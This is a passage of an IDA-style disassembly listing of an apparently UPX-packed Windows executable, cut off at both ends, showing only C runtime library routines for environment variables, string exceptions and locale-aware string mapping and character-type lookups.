ptr [eax], 0 inc eax neg ebx sbb ebx, ebx not ebx and ebx, eax push ebx push esi call dword_427004 ; SetEnvironmentVariableA push esi call sub_41B0B1 pop ecx loc_42632B: ; CODE XREF: sub_4261AB+6Ej ; sub_4261AB+104j ... xor eax, eax jmp loc_426212 sub_4261AB endp ; =============== S U B R O U T I N E ======================================= sub_426332 proc near ; CODE XREF: sub_4261AB+B2p arg_0 = dword ptr 4 arg_4 = dword ptr 8 push esi mov esi, ds:dword_4DB980 push edi mov eax, [esi] test eax, eax jz short loc_42636D mov edi, [esp+8+arg_4] loc_426344: ; CODE XREF: sub_426332+39j push edi push eax push [esp+10h+arg_0] call sub_425E56 add esp, 0Ch test eax, eax jnz short loc_426363 mov eax, [esi] mov al, [eax+edi] cmp al, 3Dh jz short loc_42637D test al, al jz short loc_42637D loc_426363: ; CODE XREF: sub_426332+22j mov eax, [esi+4] add esi, 4 test eax, eax jnz short loc_426344 loc_42636D: ; CODE XREF: sub_426332+Cj mov eax, esi sub eax, ds:dword_4DB980 sar eax, 2 neg eax loc_42637A: ; CODE XREF: sub_426332+56j pop edi pop esi retn ; --------------------------------------------------------------------------- loc_42637D: ; CODE XREF: sub_426332+2Bj ; sub_426332+2Fj mov eax, esi sub eax, ds:dword_4DB980 sar eax, 2 jmp short loc_42637A sub_426332 endp ; =============== S U B R O U T I N E ======================================= sub_42638A proc near ; CODE XREF: sub_4261AB+3Fp arg_0 = dword ptr 4 push edi mov edi, [esp+4+arg_0] xor ecx, ecx test edi, edi jnz short loc_426399 xor eax, eax pop edi retn ; --------------------------------------------------------------------------- loc_426399: ; CODE XREF: sub_42638A+9j cmp dword ptr [edi], 0 lea eax, [edi+4] jz short loc_4263AB loc_4263A1: ; CODE XREF: sub_42638A+1Fj mov edx, [eax] inc ecx add eax, 4 test edx, edx jnz short loc_4263A1 loc_4263AB: ; CODE XREF: sub_42638A+15j push ebx push ebp lea eax, ds:4[ecx*4] push esi push eax call sub_41B4D5 mov esi, eax pop ecx test esi, esi mov ebp, esi jnz short loc_4263CC push 9 call sub_41DA29 pop ecx loc_4263CC: ; CODE XREF: sub_42638A+38j mov eax, [edi] mov ebx, edi loc_4263D0: ; CODE XREF: sub_42638A+5Bj test eax, eax jz short loc_4263E7 push eax add ebx, 4 call sub_426464 mov [esi], eax mov eax, [ebx] pop ecx add esi, 4 jmp short loc_4263D0 ; --------------------------------------------------------------------------- loc_4263E7: ; CODE XREF: sub_42638A+48j and dword ptr [esi], 0 mov eax, ebp pop esi pop ebp pop ebx pop edi retn sub_42638A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4263F1 proc near ; CODE XREF: sub_4261AB+14p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp cmp ds:dword_4DCDBC, 0 jnz short loc_42640C push [ebp+arg_4] push [ebp+arg_0] call sub_41BFB0 pop ecx pop ecx pop ebp retn ; --------------------------------------------------------------------------- loc_42640C: ; CODE XREF: sub_4263F1+Aj mov ecx, [ebp+arg_0] loc_42640F: ; CODE XREF: sub_4263F1+56j movzx ax, byte ptr [ecx] test ax, ax jz short loc_426452 movzx edx, al test ds:byte_4DCEC1[edx], 4 jz short loc_42643E mov dl, [ecx+1] inc ecx test dl, dl jz short loc_426449 movzx eax, ax movzx edx, dl shl eax, 8 or eax, edx cmp [ebp+arg_4], eax jz short loc_42644D jmp short loc_426446 ; --------------------------------------------------------------------------- loc_42643E: ; CODE XREF: sub_4263F1+31j movzx edx, ax cmp [ebp+arg_4], edx jz short loc_426452 loc_426446: ; CODE XREF: sub_4263F1+4Bj inc ecx jmp short loc_42640F ; --------------------------------------------------------------------------- loc_426449: ; CODE XREF: sub_4263F1+39j xor eax, eax pop ebp retn ; --------------------------------------------------------------------------- loc_42644D: ; CODE XREF: sub_4263F1+49j lea eax, [ecx-1] pop ebp retn ; --------------------------------------------------------------------------- loc_426452: ; CODE XREF: sub_4263F1+25j ; sub_4263F1+53j movzx edx, ax mov eax, [ebp+arg_4] sub eax, edx neg eax sbb eax, eax not eax and eax, ecx pop ebp retn sub_4263F1 endp ; =============== S U B R O U T I N E ======================================= sub_426464 proc near ; CODE XREF: sub_417EEF+21p ; sub_42638A+4Ep arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] test esi, esi jz short loc_42648B push esi call sub_41AFE0 inc eax push eax call sub_41B4D5 pop ecx test eax, eax pop ecx jz short loc_42648B push esi push eax call sub_41BEB0 pop ecx pop ecx pop esi retn ; --------------------------------------------------------------------------- loc_42648B: ; CODE XREF: sub_426464+7j ; sub_426464+1Aj xor eax, eax pop esi retn sub_426464 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_426490 proc near ; CODE XREF: sub_426573+19p ; sub_42669A+19p arg_0 = dword ptr 4 push esi push [esp+4+arg_0] mov esi, ecx xor eax, eax mov [esi+4], eax mov [esi+8], eax mov [esi+0Ch], eax call sub_41AFE0 pop ecx push eax push [esp+8+arg_0] mov ecx, esi call sub_40D6F0 mov eax, esi pop esi retn 8 sub_426490 endp ; =============== S U B R O U T I N E ======================================= sub_4264BA proc near ; CODE XREF: UPX0:004264E5p ; sub_426568+6j ... push esi mov esi, ecx push 1 lea ecx, [esi+0Ch] mov dword ptr [esi], offset off_427D04 call sub_40D6B4 mov ecx, esi pop esi jmp sub_4268B6 sub_4264BA endp ; =============== S U B R O U T I N E ======================================= sub_4264D5 proc near ; DATA XREF: UPX0:00427D08o ; UPX0:00427D18o ... mov eax, [ecx+10h] test eax, eax jnz short locret_4264E1 mov eax, offset dword_4276A0 locret_4264E1: ; CODE XREF: sub_4264D5+5j retn sub_4264D5 endp ; --------------------------------------------------------------------------- loc_4264E2: ; DATA XREF: UPX0:off_427D04o push esi mov esi, ecx call sub_4264BA test byte ptr [esp+8], 1 jz short loc_4264F8 push esi call sub_41CC83 pop ecx loc_4264F8: ; CODE XREF: UPX0:004264EFj mov eax, esi pop esi retn 4 ; =============== S U B R O U T I N E ======================================= sub_4264FE proc near ; CODE XREF: sub_426573+29p mov eax, offset loc_426E32 call sub_41CC64 push ecx push ecx push esi lea eax, [ebp-10h] mov esi, ecx push eax mov [ebp-14h], esi mov dword ptr [ebp-10h], offset dword_427D20 call sub_42682F push dword ptr [ebp+8] and dword ptr [ebp-4], 0 lea ecx, [esi+0Ch] mov dword ptr [esi], offset off_427D04 call sub_4265B0 mov ecx, [ebp-0Ch] mov dword ptr [esi], offset off_427D14 mov eax, esi pop esi mov large fs:0, ecx leave retn 4 sub_4264FE endp ; =============== S U B R O U T I N E ======================================= sub_42654C proc near ; DATA XREF: UPX0:off_427D14o arg_0 = byte ptr 4 push esi mov esi, ecx call sub_426568 test [esp+4+arg_0], 1 jz short loc_426562 push esi call sub_41CC83 pop ecx loc_426562: ; CODE XREF: sub_42654C+Dj mov eax, esi pop esi retn 4 sub_42654C endp ; =============== S U B R O U T I N E ======================================= sub_426568 proc near ; CODE XREF: sub_42654C+3p ; DATA XREF: UPX0:0042808Co mov dword ptr [ecx], offset off_427D14 jmp sub_4264BA sub_426568 endp ; =============== S U B R O U T I N E ======================================= sub_426573 proc near ; CODE XREF: sub_40D561+13p ; sub_40D725+Ep mov eax, offset loc_426E44 call sub_41CC64 sub esp, 30h lea eax, [ebp-0Dh] push eax push offset aInvalidStringP ; "invalid string position" lea ecx, [ebp-20h] call sub_426490 and dword ptr [ebp-4], 0 lea eax, [ebp-20h] push eax lea ecx, [ebp-3Ch] call sub_4264FE push offset dword_428088 lea eax, [ebp-3Ch] push eax call sub_4268D9 int 3 ; Trap to Debugger sub_426573 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_4265B0 proc near ; CODE XREF: sub_4264FE+32p ; sub_4265D0+32p ... arg_0 = dword ptr 4 push esi xor eax, eax push 0FFFFFFFFh mov esi, ecx push eax push [esp+0Ch+arg_0] mov [esi+4], eax mov [esi+8], eax mov [esi+0Ch], eax call sub_40D561 mov eax, esi pop esi retn 4 sub_4265B0 endp ; =============== S U B R O U T I N E ======================================= sub_4265D0 proc near ; CODE XREF: sub_42669A+29p mov eax, offset loc_426E56 call sub_41CC64 push ecx push ecx push esi lea eax, [ebp-10h] mov esi, ecx push eax mov [ebp-14h], esi mov dword ptr [ebp-10h], offset dword_427D20 call sub_42682F push dword ptr [ebp+8] and dword ptr [ebp-4], 0 lea ecx, [esi+0Ch] mov dword ptr [esi], offset off_427D04 call sub_4265B0 mov ecx, [ebp-0Ch] mov eax, esi pop esi mov large fs:0, ecx leave retn 4 sub_4265D0 endp ; =============== S U B R O U T I N E ======================================= sub_426618 proc near ; CODE XREF: sub_426682+7p ; sub_4266DE+7p ... mov eax, offset loc_426E68 call sub_41CC64 push ecx push esi push edi mov edi, [ebp+8] mov esi, ecx push edi mov [ebp-10h], esi call sub_42686C and dword ptr [ebp-4], 0 add edi, 0Ch push edi lea ecx, [esi+0Ch] mov dword ptr [esi], offset off_427D04 call sub_4265B0 mov ecx, [ebp-0Ch] pop edi mov eax, esi pop esi mov large fs:0, ecx leave retn 4 sub_426618 endp ; =============== S U B R O U T I N E ======================================= sub_42665B proc near ; DATA XREF: UPX0:off_427D40o arg_0 = byte ptr 4 push esi mov esi, ecx call sub_426677 test [esp+4+arg_0], 1 jz short loc_426671 push esi call sub_41CC83 pop ecx loc_426671: ; CODE XREF: sub_42665B+Dj mov eax, esi pop esi retn 4 sub_42665B endp ; =============== S U B R O U T I N E ======================================= sub_426677 proc near ; CODE XREF: sub_42665B+3p ; DATA XREF: UPX0:00428134o mov dword ptr [ecx], offset off_427D40 jmp sub_4264BA sub_426677 endp ; =============== S U B R O U T I N E ======================================= sub_426682 proc near ; CODE XREF: sub_4266F6+46p arg_0 = dword ptr 4 push esi push [esp+4+arg_0] mov esi, ecx call sub_426618 mov dword ptr [esi], offset off_427D14 mov eax, esi pop esi retn 4 sub_426682 endp ; =============== S U B R O U T I N E ======================================= sub_42669A proc near ; CODE XREF: sub_40D4B1+15p ; sub_40D50A+15p ... mov eax, offset loc_426E7A call sub_41CC64 sub esp, 30h lea eax, [ebp-0Dh] push eax push offset aStringTooLong ; "string too long" lea ecx, [ebp-20h] call sub_426490 and dword ptr [ebp-4], 0 lea eax, [ebp-20h] push eax lea ecx, [ebp-3Ch] call sub_4265D0 push offset dword_428130 lea eax, [ebp-3Ch] push eax mov dword ptr [ebp-3Ch], offset off_427D40 call sub_4268D9 int 3 ; Trap to Debugger sub_42669A endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_4266DE proc near ; CODE XREF: sub_4266F6+28p arg_0 = dword ptr 4 push esi push [esp+4+arg_0] mov esi, ecx call sub_426618 mov dword ptr [esi], offset off_427D40 mov eax, esi pop esi retn 4 sub_4266DE endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4266F6 proc near ; DATA XREF: UPX0:00427D0Co var_1C = byte ptr -1Ch push ebp mov ebp, esp sub esp, 1Ch push ecx lea ecx, [ebp+var_1C] call sub_426618 push offset dword_428170 lea eax, [ebp+var_1C] push eax call sub_4268D9 int 3 ; Trap to Debugger loc_426714: ; DATA XREF: UPX0:00427D48o push ebp mov ebp, esp sub esp, 1Ch push ecx lea ecx, [ebp+var_1C] call sub_4266DE push offset dword_428130 lea eax, [ebp+var_1C] push eax call sub_4268D9 int 3 ; Trap to Debugger loc_426732: ; DATA XREF: UPX0:00427D1Co push ebp mov ebp, esp sub esp, 1Ch push ecx lea ecx, [ebp+var_1C] call sub_426682 push offset dword_428088 lea eax, [ebp+var_1C] push eax call sub_4268D9 int 3 ; Trap to Debugger sub_4266F6 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_426750 proc near ; CODE XREF: sub_40D99C+6Cp jmp dword_4271D8 sub_426750 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_426756 proc near ; CODE XREF: sub_40CE41+5Ep ; sub_40E992+14Ap ... jmp dword_42722C sub_426756 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_42675C proc near ; CODE XREF: sub_41C8D0+23p ; sub_41CB74+13p jmp dword_42719C sub_42675C endp ; =============== S U B R O U T I N E ======================================= sub_426762 proc near ; CODE XREF: sub_417276+E2p ; sub_417276+F9p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 cmp ds:dword_4DBA14, 0 push ebx jnz short loc_4267A8 mov edx, [esp+4+arg_4] mov ecx, [esp+4+arg_0] loc_426774: ; CODE XREF: sub_426762+42j mov bx, [ecx] cmp bx, 5Ah ja short loc_426786 cmp bx, 41h jb short loc_426786 add ebx, 20h loc_426786: ; CODE XREF: sub_426762+19j ; sub_426762+1Fj mov ax, [edx] cmp ax, 5Ah ja short loc_426798 cmp ax, 41h jb short loc_426798 add eax, 20h loc_426798: ; CODE XREF: sub_426762+2Bj ; sub_426762+31j inc ecx inc ecx inc edx inc edx test bx, bx jz short loc_4267D8 cmp bx, ax jz short loc_426774 jmp short loc_4267D8 ; --------------------------------------------------------------------------- loc_4267A8: ; CODE XREF: sub_426762+8j push esi mov esi, [esp+8+arg_0] push edi mov edi, [esp+0Ch+arg_4] loc_4267B2: ; CODE XREF: sub_426762+72j mov ax, [esi] inc esi push eax inc esi call sub_426913 mov ebx, eax mov ax, [edi] inc edi push eax inc edi call sub_426913 pop ecx test bx, bx pop ecx jz short loc_4267D6 cmp bx, ax jz short loc_4267B2 loc_4267D6: ; CODE XREF: sub_426762+6Dj pop edi pop esi loc_4267D8: ; CODE XREF: sub_426762+3Dj ; sub_426762+44j movzx ecx, ax movzx eax, bx sub eax, ecx pop ebx retn sub_426762 endp ; =============== S U B R O U T I N E ======================================= sub_4267E2 proc near ; CODE XREF: UPX0:004267FAp mov dword ptr [ecx], offset off_427D60 mov ecx, [ecx+4] test ecx, ecx jz short locret_4267F6 push ecx call sub_41B0B1 pop ecx locret_4267F6: ; CODE XREF: sub_4267E2+Bj retn sub_4267E2 endp ; --------------------------------------------------------------------------- loc_4267F7: ; DATA XREF: UPX0:off_427D60o push esi mov esi, ecx call sub_4267E2 test byte ptr [esp+8], 1 jz short loc_42680D push esi call sub_41CC83 pop ecx loc_42680D: ; CODE XREF: UPX0:00426804j mov eax, esi pop esi retn 4 ; --------------------------------------------------------------------------- loc_426813: ; DATA XREF: UPX0:off_427D68o push esi mov esi, ecx call sub_4268B6 test byte ptr [esp+8], 1 jz short loc_426829 push esi call sub_41CC83 pop ecx loc_426829: ; CODE XREF: UPX0:00426820j mov eax, esi pop esi retn 4 ; =============== S U B R O U T I N E ======================================= sub_42682F proc near ; CODE XREF: sub_4264FE+1Dp ; sub_4265D0+1Dp arg_0 = dword ptr 4 push esi push edi mov edi, [esp+8+arg_0] mov esi, ecx mov dword ptr [esi], offset off_427D68 push dword ptr [edi] call sub_41AFE0 inc eax push eax call sub_41CFC5 pop ecx mov [esi+4], eax test eax, eax pop ecx jz short loc_42685E push dword ptr [edi] push eax call sub_41BEB0 pop ecx pop ecx loc_42685E: ; CODE XREF: sub_42682F+23j mov dword ptr [esi+8], 1 mov eax, esi pop edi pop esi retn 4 sub_42682F endp ; =============== S U B R O U T I N E ======================================= sub_42686C proc near ; CODE XREF: sub_426618+16p arg_0 = dword ptr 4 push esi push edi mov edi, [esp+8+arg_0] mov esi, ecx mov dword ptr [esi], offset off_427D68 mov eax, [edi+8] test eax, eax mov [esi+8], eax jz short loc_4268A9 push dword ptr [edi+4] call sub_41AFE0 inc eax push eax call sub_41CFC5 pop ecx mov [esi+4], eax test eax, eax pop ecx jz short loc_4268AF push dword ptr [edi+4] push eax call sub_41BEB0 pop ecx pop ecx jmp short loc_4268AF ; --------------------------------------------------------------------------- loc_4268A9: ; CODE XREF: sub_42686C+16j mov eax, [edi+4] mov [esi+4], eax loc_4268AF: ; CODE XREF: sub_42686C+2Ej ; sub_42686C+3Bj mov eax, esi pop edi pop esi retn 4 sub_42686C endp ; =============== S U B R O U T I N E ======================================= sub_4268B6 proc near ; CODE XREF: sub_4264BA+16j ; UPX0:00426816p ... cmp dword ptr [ecx+8], 0 mov dword ptr [ecx], offset off_427D68 jz short locret_4268CB push dword ptr [ecx+4] call sub_41CC83 pop ecx locret_4268CB: ; CODE XREF: sub_4268B6+Aj retn sub_4268B6 endp ; =============== S U B R O U T I N E ======================================= sub_4268CC proc near ; DATA XREF: UPX0:00427D6Co mov eax, [ecx+4] test eax, eax jnz short locret_4268D8 mov eax, offset aUnknownExcepti ; "Unknown exception" locret_4268D8: ; CODE XREF: sub_4268CC+5j retn sub_4268CC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4268D9 proc near ; CODE XREF: sub_426573+37p ; sub_42669A+3Ep ... var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_C = byte ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 20h mov eax, [ebp+arg_0] push esi push edi push 8 pop ecx mov esi, offset dword_427D88 lea edi, [ebp+var_20] rep movsd mov [ebp+var_8], eax mov eax, [ebp+arg_4] mov [ebp+var_4], eax lea eax, [ebp+var_C] push eax push [ebp+var_10] push [ebp+var_1C] push [ebp+var_20] call dword_42705C ; RaiseException pop edi pop esi leave retn 8 sub_4268D9 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_426913 proc near ; CODE XREF: sub_426762+56p ; sub_426762+63p var_2 = word ptr -2 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx mov eax, [ebp+arg_0] cmp ax, 0FFFFh jnz short loc_426925 or ax, ax leave retn ; --------------------------------------------------------------------------- loc_426925: ; CODE XREF: sub_426913+Bj cmp ds:dword_4DBA14, 0 jnz short loc_42693F cmp ax, 41h jb short locret_426986 cmp ax, 5Ah ja short locret_426986 add eax, 20h leave retn ; --------------------------------------------------------------------------- loc_42693F: ; CODE XREF: sub_426913+19j cmp ax, 100h jnb short loc_426959 push 1 push eax call sub_426BC1 pop ecx test eax, eax pop ecx jnz short loc_426959 mov ax, word ptr [ebp+arg_0] leave retn ; --------------------------------------------------------------------------- loc_426959: ; CODE XREF: sub_426913+30j ; sub_426913+3Ej push 0 lea eax, [ebp+var_2] push 1 push eax lea eax, [ebp+arg_0] push 1 push eax push 100h push ds:dword_4DBA14 call sub_426988 add esp, 1Ch test eax, eax mov ax, word ptr [ebp+arg_0] jz short locret_426986 mov ax, [ebp+var_2] locret_426986: ; CODE XREF: sub_426913+1Fj ; sub_426913+25j ... leave retn sub_426913 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_426988 proc near ; CODE XREF: sub_426913+5Fp var_2C = dword ptr -2Ch var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_427DA8 push offset sub_4234B8 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 1Ch push ebx push esi push edi mov [ebp+var_18], esp xor esi, esi cmp ds:dword_4DBC6C, esi jnz short loc_4269FE push esi push esi push 1 pop ebx push ebx push offset dword_427938 mov edi, 100h push edi push esi call dword_427050 ; LCMapStringW test eax, eax jz short loc_4269DC mov ds:dword_4DBC6C, ebx jmp short loc_4269FE ; --------------------------------------------------------------------------- loc_4269DC: ; CODE XREF: sub_426988+4Aj push esi push esi push ebx push offset dword_4CB50C push edi push esi call dword_427054 ; LCMapStringA test eax, eax jz loc_426B7D mov ds:dword_4DBC6C, 2 loc_4269FE: ; CODE XREF: sub_426988+2Ej ; sub_426988+52j cmp [ebp+arg_C], esi jle short loc_426A13 push [ebp+arg_C] push [ebp+arg_8] call sub_426B91 pop ecx pop ecx mov [ebp+arg_C], eax loc_426A13: ; CODE XREF: sub_426988+79j mov eax, ds:dword_4DBC6C cmp eax, 1 jnz short loc_426A3A push [ebp+arg_14] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call dword_427050 ; LCMapStringW jmp loc_426B7F ; --------------------------------------------------------------------------- loc_426A3A: ; CODE XREF: sub_426988+93j cmp eax, 2 jnz loc_426B7D cmp [ebp+arg_18], esi jnz short loc_426A50 mov eax, ds:dword_4DBA24 mov [ebp+arg_18], eax loc_426A50: ; CODE XREF: sub_426988+BEj push esi push esi push esi push esi push [ebp+arg_C] push [ebp+arg_8] push 220h push [ebp+arg_18] call dword_42717C ; WideCharToMultiByte mov [ebp+var_20], eax cmp eax, esi jz loc_426B7D mov [ebp+var_4], esi add eax, 3 and al, 0FCh call sub_41BB20 mov [ebp+var_18], esp mov eax, esp mov [ebp+var_1C], eax jmp short loc_426A96 ; --------------------------------------------------------------------------- push 1 pop eax retn ; --------------------------------------------------------------------------- mov esp, [ebp+var_18] xor esi, esi mov [ebp+var_1C], esi loc_426A96: ; CODE XREF: sub_426988+100j or [ebp+var_4], 0FFFFFFFFh cmp [ebp+var_1C], esi jz loc_426B7D push esi push esi push [ebp+var_20] push [ebp+var_1C] push [ebp+arg_C] push [ebp+arg_8] push 220h push [ebp+arg_18] call dword_42717C ; WideCharToMultiByte test eax, eax jz loc_426B7D push esi push esi push [ebp+var_20] push [ebp+var_1C] push [ebp+arg_4] push [ebp+arg_0] call dword_427054 ; LCMapStringA mov edi, eax mov [ebp+var_2C], edi cmp edi, esi jz loc_426B7D mov [ebp+var_4], 1 add eax, 3 and al, 0FCh call sub_41BB20 mov [ebp+var_18], esp mov ebx, esp mov [ebp+var_24], ebx or [ebp+var_4], 0FFFFFFFFh jmp short loc_426B19 ; --------------------------------------------------------------------------- push 1 pop eax retn ; --------------------------------------------------------------------------- mov esp, [ebp+var_18] xor esi, esi xor ebx, ebx or [ebp+var_4], 0FFFFFFFFh mov edi, [ebp+var_2C] loc_426B19: ; CODE XREF: sub_426988+17Dj cmp ebx, esi jz short loc_426B7D push edi push ebx push [ebp+var_20] push [ebp+var_1C] push [ebp+arg_4] push [ebp+arg_0] call dword_427054 ; LCMapStringA test eax, eax jz short loc_426B7D test byte ptr [ebp+arg_4+1], 4 jz short loc_426B57 mov eax, [ebp+arg_14] cmp eax, esi jz short loc_426B79 cmp eax, edi jl short loc_426B48 mov eax, edi loc_426B48: ; CODE XREF: sub_426988+1BCj push eax push ebx push [ebp+arg_10] call sub_41B5F0 add esp, 0Ch jmp short loc_426B79 ; --------------------------------------------------------------------------- loc_426B57: ; CODE XREF: sub_426988+1B1j cmp [ebp+arg_14], esi jnz short loc_426B60 push esi push esi jmp short loc_426B66 ; --------------------------------------------------------------------------- loc_426B60: ; CODE XREF: sub_426988+1D2j push [ebp+arg_14] push [ebp+arg_10] loc_426B66: ; CODE XREF: sub_426988+1D6j push edi push ebx push 1 push [ebp+arg_18] call dword_427180 ; MultiByteToWideChar mov edi, eax cmp edi, esi jz short loc_426B7D loc_426B79: ; CODE XREF: sub_426988+1B8j ; sub_426988+1CDj mov eax, edi jmp short loc_426B7F ; --------------------------------------------------------------------------- loc_426B7D: ; CODE XREF: sub_426988+66j ; sub_426988+B5j ... xor eax, eax loc_426B7F: ; CODE XREF: sub_426988+ADj ; sub_426988+1F3j lea esp, [ebp-38h] mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_426988 endp ; =============== S U B R O U T I N E ======================================= sub_426B91 proc near ; CODE XREF: sub_426988+81p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov edx, [esp+arg_4] mov eax, [esp+arg_0] test edx, edx push esi lea ecx, [edx-1] jz short loc_426BB0 loc_426BA1: ; CODE XREF: sub_426B91+1Dj cmp word ptr [eax], 0 jz short loc_426BB0 inc eax mov esi, ecx inc eax dec ecx test esi, esi jnz short loc_426BA1 loc_426BB0: ; CODE XREF: sub_426B91+Ej ; sub_426B91+14j cmp word ptr [eax], 0 pop esi jnz short loc_426BBE sub eax, [esp+arg_0] sar eax, 1 retn ; --------------------------------------------------------------------------- loc_426BBE: ; CODE XREF: sub_426B91+24j mov eax, edx retn sub_426B91 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_426BC1 proc near ; CODE XREF: sub_426913+35p var_4 = dword ptr -4 arg_0 = word ptr 8 arg_4 = word ptr 0Ch push ebp mov ebp, esp push ecx cmp [ebp+arg_0], 0FFFFh jz short loc_426C01 cmp [ebp+arg_0], 100h jnb short loc_426BE5 movzx eax, [ebp+arg_0] mov ecx, off_43C9DC mov ax, [ecx+eax*2] jmp short loc_426C08 ; --------------------------------------------------------------------------- loc_426BE5: ; CODE XREF: sub_426BC1+12j push 0 lea eax, [ebp+var_4] push 0 push eax lea eax, [ebp+arg_0] push 1 push eax push 1 call sub_426C13 add esp, 18h test eax, eax jnz short loc_426C05 loc_426C01: ; CODE XREF: sub_426BC1+Aj xor eax, eax leave retn ; --------------------------------------------------------------------------- loc_426C05: ; CODE XREF: sub_426BC1+3Ej mov eax, [ebp+var_4] loc_426C08: ; CODE XREF: sub_426BC1+22j movzx ecx, [ebp+arg_4] movzx eax, ax and eax, ecx leave retn sub_426BC1 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_426C13 proc near ; CODE XREF: sub_426BC1+34p var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = byte ptr -1Ch var_18 = dword ptr -18h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_427DC0 push offset sub_4234B8 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 1Ch push ebx push esi push edi mov [ebp+var_18], esp mov eax, ds:dword_4DBC70 xor edi, edi cmp eax, edi jnz short loc_426C82 lea eax, [ebp+var_1C] push eax push 1 pop esi push esi push offset dword_427938 push esi call dword_427020 ; GetStringTypeW test eax, eax jz short loc_426C60 mov eax, esi jmp short loc_426C7D ; --------------------------------------------------------------------------- loc_426C60: ; CODE XREF: sub_426C13+47j lea eax, [ebp+var_1C] push eax push esi push offset dword_4CB50C push esi push edi call dword_427024 ; GetStringTypeA test eax, eax jz loc_426DC4 push 2 pop eax loc_426C7D: ; CODE XREF: sub_426C13+4Bj mov ds:dword_4DBC70, eax loc_426C82: ; CODE XREF: sub_426C13+2Fj cmp eax, 1 jnz short loc_426C9E push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call dword_427020 ; GetStringTypeW jmp loc_426DC6 ; --------------------------------------------------------------------------- loc_426C9E: ; CODE XREF: sub_426C13+72j cmp eax, 2 jnz loc_426DC4 cmp [ebp+arg_10], edi jnz short loc_426CB4 mov eax, ds:dword_4DBA24 mov [ebp+arg_10], eax loc_426CB4: ; CODE XREF: sub_426C13+97j push edi push edi push edi push edi push [ebp+arg_8] push [ebp+arg_4] push 220h push [ebp+arg_10] call dword_42717C ; WideCharToMultiByte mov esi, eax mov [ebp+var_28], esi cmp esi, edi jz loc_426DC4 mov [ebp+var_4], edi add eax, 3 and al, 0FCh call sub_41BB20 mov [ebp+var_18], esp mov eax, esp mov [ebp+var_2C], eax push esi push edi push eax call sub_41B590 add esp, 0Ch or [ebp+var_4], 0FFFFFFFFh jmp short loc_426D12 ; --------------------------------------------------------------------------- push 1 pop eax retn ; --------------------------------------------------------------------------- mov esp, [ebp+var_18] xor edi, edi mov [ebp+var_2C], edi or [ebp+var_4], 0FFFFFFFFh mov esi, [ebp+var_28] loc_426D12: ; CODE XREF: sub_426C13+EAj cmp [ebp+var_2C], edi jz loc_426DC4 push edi push edi push esi push [ebp+var_2C] push [ebp+arg_8] push [ebp+arg_4] push 220h push [ebp+arg_10] call dword_42717C ; WideCharToMultiByte test eax, eax jz loc_426DC4 mov [ebp+var_4], 1 lea eax, [esi+esi+2] add eax, 3 and al, 0FCh call sub_41BB20 mov [ebp+var_18], esp mov ebx, esp mov [ebp+var_24], ebx jmp short loc_426D67 ; --------------------------------------------------------------------------- push 1 pop eax retn ; --------------------------------------------------------------------------- mov esp, [ebp+var_18] xor edi, edi xor ebx, ebx loc_426D67: ; CODE XREF: sub_426C13+147j or [ebp+var_4], 0FFFFFFFFh cmp ebx, edi jz short loc_426DC4 mov eax, [ebp+arg_14] cmp eax, edi jnz short loc_426D7B mov eax, ds:dword_4DBA14 loc_426D7B: ; CODE XREF: sub_426C13+161j mov ecx, [ebp+arg_8] lea edi, [ecx+ecx] lea esi, [edi+ebx] or word ptr [esi], 0FFFFh or word ptr [esi-2], 0FFFFh push ebx push [ebp+var_28] push [ebp+var_2C] push [ebp+arg_0] push eax call dword_427024 ; GetStringTypeA mov [ebp+var_20], eax cmp word ptr [esi-2], 0FFFFh jz short loc_426DC4 cmp word ptr [esi], 0FFFFh jnz short loc_426DC4 push edi push ebx push [ebp+arg_C] call sub_41CC90 add esp, 0Ch mov eax, [ebp+var_20] jmp short loc_426DC6 ; --------------------------------------------------------------------------- loc_426DC4: ; CODE XREF: sub_426C13+61j ; sub_426C13+8Ej ... xor eax, eax loc_426DC6: ; CODE XREF: sub_426C13+86j ; sub_426C13+1AFj lea esp, [ebp-38h] mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_426C13 endp ; =============== S U B R O U 